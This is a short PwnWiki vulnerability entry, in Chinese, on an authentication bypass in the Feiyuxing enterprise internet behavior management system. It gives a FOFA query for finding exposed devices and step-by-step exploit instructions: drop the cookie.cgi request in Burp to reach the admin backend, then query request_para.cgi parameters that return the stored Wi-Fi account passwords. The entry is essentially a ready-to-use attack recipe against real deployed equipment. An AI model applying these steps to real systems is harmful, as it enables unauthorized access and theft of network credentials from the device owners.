免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
FOFA
title="飞鱼星企业级智能上网行为管理系统"
漏洞利用
访问主页使用Burp抓包;
http://xxx.xxx.xxx.xxx/home/index.html
使用Burp Dorp cookie.cgi请求包
成功越权后台,其中还存在敏感信息泄露
/request_para.cgi?parameter=wifi_info #获取ALL WIFI账号密码 /request_para.cgi?parameter=wifi_get_5g_host #获取5GWIFI账号密码 /request_para.cgi?parameter=wifi_get_2g_host #获取2GWIFI账号密码
免费、自由、人人可编辑的漏洞库--PwnWiki.com